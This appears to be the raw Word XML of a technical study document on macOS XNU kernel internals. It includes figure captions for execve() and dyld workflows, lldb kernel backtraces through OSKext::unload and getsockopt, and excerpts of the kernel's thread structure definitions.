      <w:bookmarkStart w:id="24" w:name="_Toc445313228"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Key mechanism</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidR="00220FEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D0527" w:rsidRDefault="000D0527" w:rsidP="000D0527">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc445313229"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>execve()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="000D0527" w:rsidRDefault="000D0527" w:rsidP="000D0527"/>
    <w:p w:rsidR="00D90486" w:rsidRDefault="00D90486" w:rsidP="00D90486">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59650FE8" wp14:editId="1520201C">
            <wp:extent cx="5041900" cy="6070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1900" cy="6070600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90486" w:rsidRDefault="00D90486" w:rsidP="00D90486">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> execve() work flow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00846C79" w:rsidRDefault="00846C79" w:rsidP="00846C79">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc445313230"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dyld</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="00D90486" w:rsidRDefault="00D90486" w:rsidP="00D90486"/>
    <w:p w:rsidR="00D90486" w:rsidRDefault="00D90486" w:rsidP="00D90486">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C7C8A12" wp14:editId="20C99B59">
            <wp:extent cx="5274310" cy="476030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0309"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6E02" w:rsidRDefault="00D90486" w:rsidP="00FC6E02">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> dyld work flow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00922383" w:rsidRDefault="00922383" w:rsidP="00922383"/>
    <w:p w:rsidR="00922383" w:rsidRDefault="00E05684" w:rsidP="00922383">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc445313231"/>
      <w:r w:rsidRPr="00E638D8">
        <w:t>OSKext::unload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>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Cs w:val="28"/>
        </w:rPr>
      </w:pP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color w:val="999999"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(lldb) </w:t>
      </w:r>
      <w:r w:rsidRPr="00E05684">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b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thread #2: tid = 0x2037, 0xffffff8010b7a2a1 kernel.development`_FREE(addr=0x00000001009cd3d9, type=&lt;unavailable&gt;) + 33 at kern_malloc.c:676, name = '0xffffff801b5485d8', queue = '0x0', stop reason = signal SIGSTOP</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 frame #0: 0xffffff8010b7a2a1 kernel.development`_FREE(addr=0x00000001009cd3d9, type=&lt;unavailable&gt;) + 33 at kern_malloc.c:676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1: 0xffffff7f92620200</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2: 0xffffff7f9262072b</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    frame #3: 0xffffff8010c2291a kernel.development`OSKext::stop(this=0xffffff801d1870a0) + 314 at OSKext.cpp:6146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4: 0xffffff8010c22b50 kernel.development`OSKext::unload(this=0xffffff801d1870a0) + 400 at OSKext.cpp:6246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5: 0xffffff8010c1e0ee kernel.development`OSKext::removeKext(aKext=0xffffff801d1870a0, terminateServicesAndRemovePersonalitiesFlag=true) + 462 at OSKext.cpp:3406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6: 0xffffff8010c25536 kernel.development`OSKext::handleRequest(hostPriv=0xffffff8016b13920, clientLogFilter=&lt;unavailable&gt;, requestBuffer=&lt;unavailable&gt;, requestLength=&lt;unavailable&gt;, responseOut=0xffffff88706dbd98, responseLengthOut=0xffffff88706dbd94, logInfoOut=&lt;unavailable&gt;, logInfoLengthOut=&lt;unavailable&gt;) + 2022 at OSKext.cpp:7799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7: 0xffffff8010c38224 kernel.development`::kext_request(hostPriv=0xffffff8010eeb310, clientLogSpec=4082, requestIn=&lt;unavailable&gt;, requestLengthIn=230, responseOut=0xffffff801d0c3188, responseLengthOut=0xffffff801d0c31b0, logDataOut=&lt;unavailable&gt;, logDataLengthOut=&lt;unavailable&gt;, op_result=&lt;unavailable&gt;) + 468 at OSKextLib.cpp:290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8: 0xffffff80106df8e6 kernel.development`_Xkext_request(InHeadP=0xffffff8017d61d78, OutHeadP=0xffffff801d0c3164) + 262 at host_priv_server.c:2929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9: 0xffffff8010692963 kernel.development`ipc_kobject_server(request=0xffffff8017d61d00) + 259 at ipc_kobject.c:339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10: 0xffffff801066e6f3 kernel.development`ipc_kmsg_send(kmsg=&lt;unavailable&gt;, option=&lt;unavailable&gt;, send_timeout=0) + 195 at ipc_kmsg.c:1440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11: 0xffffff8010685035 kernel.development`mach_msg_overwrite_trap(args=&lt;unavailable&gt;) + 197 at mach_msg.c:470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12: 0xffffff8010789cc0 kernel.development`mach_call_munger64(state=0xffffff801b358540) + 480 at bsd_i386.c:560 [opt]</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E05684">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #13: 0xffffff80107bf436 kernel.development`hndl_mach_scall64 + 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00922383" w:rsidRPr="00E05684" w:rsidRDefault="00922383" w:rsidP="0092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16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E05684">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(lldb) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00800989" w:rsidRDefault="00800989" w:rsidP="00800989"/>
    <w:p w:rsidR="00800989" w:rsidRDefault="00800989" w:rsidP="00800989">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc445313232"/>
      <w:r w:rsidRPr="00800989">
        <w:t>Kernel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00800989">
        <w:t>getsockopt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="00922383" w:rsidRPr="008F25B6" w:rsidRDefault="00922383" w:rsidP="00800989">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pP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color w:val="999999"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(lldb) </w:t>
      </w:r>
      <w:r w:rsidRPr="008F25B6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b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lastRenderedPageBreak/>
        <w:t>* thread #2: tid = 0x0eff, 0xffffff800d3668d3 kernel.development`strncpy(s1=0x0000000000000000, s2="", n=248) + 19 at subrs.c:304, name = '0xffffff80172fe130', queue = '0x0', stop reason = signal SIGSTOP</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 frame #0: 0xffffff800d3668d3 kernel.development`strncpy(s1=0x0000000000000000, s2="", n=248) + 19 at subrs.c:304 [op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1: 0xffffff7f8f220be7</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2: 0xffffff800d76a0dc kernel.development`ctl_ctloutput(so=0xffffff8014814650, sopt=0xffffff886d86bf08) + 444 at kern_control.c:1133 [op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3: 0xffffff800d7ccfaf kernel.development`sogetoptlock(so=0xffffff8014814650, sopt=0xffffff886d86bf08, dolock=1) + 287 at uipc_socket.c:5200 [op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4: 0xffffff800d7d8bd2 kernel.development`getsockopt(p=&lt;unavailable&gt;, uap=0xffffff8017333000, retval=&lt;unavailable&gt;) + 194 at uipc_syscalls.c:2526 [op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5: 0xffffff800d8000ef kernel.development`unix_syscall64(state=0xffffff80172eb720) + 703 at systemcalls.c:384 [opt]</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8F25B6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #6: 0xffffff800d3bf416 kernel.development`hndl_unix_scall64 + 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00800989" w:rsidRPr="008F25B6"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16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F25B6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(lldb) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00800989" w:rsidRPr="00800989"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20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00800989" w:rsidRPr="00800989"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20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00800989" w:rsidRPr="00800989" w:rsidRDefault="00800989" w:rsidP="0080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20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00800989" w:rsidRPr="00922383" w:rsidRDefault="00800989" w:rsidP="00800989"/>
    <w:p w:rsidR="00FC6E02" w:rsidRDefault="00FC6E02" w:rsidP="00FC6E02">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc445313233"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Runtime Structure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6E02" w:rsidRPr="00FC6E02" w:rsidRDefault="00FC6E02" w:rsidP="00FC6E02"/>
    <w:p w:rsidR="00205331" w:rsidRDefault="00205331" w:rsidP="00205331">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc445313234"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Thread</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="007A498D" w:rsidRDefault="007A498D" w:rsidP="007A498D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="715971C2" wp14:editId="0F6E03CF">
            <wp:extent cx="5080000" cy="6064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0000" cy="6064250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A9161A" w:rsidRDefault="007A498D" w:rsidP="007A498D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Relationship of thread, process,task</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003337CC" w:rsidRDefault="004106D2" w:rsidP="003337CC">
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidR="003337CC" w:rsidRPr="00EB4348">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.cnblogs.com/andypeker/p/4360540.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003337CC" w:rsidRPr="003337CC" w:rsidRDefault="003337CC" w:rsidP="003337CC"/>
    <w:p w:rsidR="00A9161A" w:rsidRPr="00A9161A" w:rsidRDefault="00A9161A" w:rsidP="00A9161A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9161A">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\osfmk\mach\mach_types.h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A9161A" w:rsidRDefault="00A9161A" w:rsidP="00A9161A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>typedef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>thread_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b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>thread_act_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C0456" w:rsidRPr="004C0456" w:rsidRDefault="004C0456" w:rsidP="004C0456">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\osfmk\kern\thread.h</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hread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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w: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NOTE:   The runq field in the thread structure has an unusual</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locking protocol.  If its value is PROCESSOR_NULL, then it is</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locked by the thread_lock, but if its value is something else</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then it is locked by the associated run queue lock. It is</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set to PROCESSOR_NULL without holding the thread lock, but the</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transition from PROCESSOR_NULL to non-null must be done</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under the thread lock and the run queue lock.</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When the thread is on a wait queue, these first three fields</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are treated as an unofficial union with a wait_queue_elemen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If you change these, you must change that definition as well</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kern/wait_queue.h).</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Items examined often, modified infrequentl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queue_chain_t   link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un/wait queue link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processor_t     runq</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un queue assignmen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ait_queue_t    wait_queu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ait queue we are currently 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event64_t       wait_eve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ait queue even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ata updated during assert_wait/thread_wakeu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decl_simple_lock_data</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(,</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sched_lock</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uling lock (thread_lo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decl_simple_lock_data</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(,</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wake_lock</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for thread stop / wait (wake_lo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option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options set by thread itself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INTMASK      </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x0003</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interrupt / abort level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lastRenderedPageBreak/>
        <w:t>#define</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TH_OPT_VMPRIV       </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x0004</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ay allocate reserved memor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DTRACE       </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x0008</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executing under dtrace_prob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SYSTEM_CRITICAL  </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x001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must always be allowed to run - even under heavy lo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PROC_CPULIMIT    </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x002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has a task-wide CPU limit applied to i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PRVT_CPULIMIT    </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x004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has a thread-private CPU limit applied to i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OPT_IDLE_THREAD      </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x008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is a per-processor idle thread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boolean_t           wake_activ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ake event on sto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at_safe_poi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_abort_safely allow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ast_t               reason</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hy we block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hread_continue_t   continuation</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ntinue here next dispatch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paramet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ntinuation parameter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sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    wait_result_t       wait_resul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outcome of wait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may be examined by this thread</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 WITHOUT locking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ata updated/used in thread_invok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vm_offset_t         kernel_stack</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urrent kernel sta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vm_offset_t         reserved_stack</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served kernel stack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stat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Thread states [bits or'ed]</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lastRenderedPageBreak/>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WAIT         </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x01</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queued for waiting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USP         </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x02</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topped or requested to sto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RUN          </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x04</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unning or on runq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UNINT        </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x08</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aiting uninteruptibl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TERMINATE    </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x1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halted at termin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TERMINATE2   </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x2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dded to termination queu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IDLE         </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x8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idling processor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uling inform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ched_mode_t            sched_mod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uling mod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ched_mode_t            saved_mod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 mode during forced mode demotion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fi_class_id_t          sfi_clas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FI class (XXX Updated on CSW/QE/AS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fi_class_id_t          sfi_wait_clas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urrently in SFI wait for this class, protected by sfi_lo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sched_flag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urrent flag bit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FAIRSHARE_TRIPPED  </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x0001</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fairshare scheduling activat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FAILSAFE       </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x0002</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fail-safe has tripp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THROTTLED      </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x0004</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treated as background for scheduler decay purpos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DEMOTED_MASK      </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
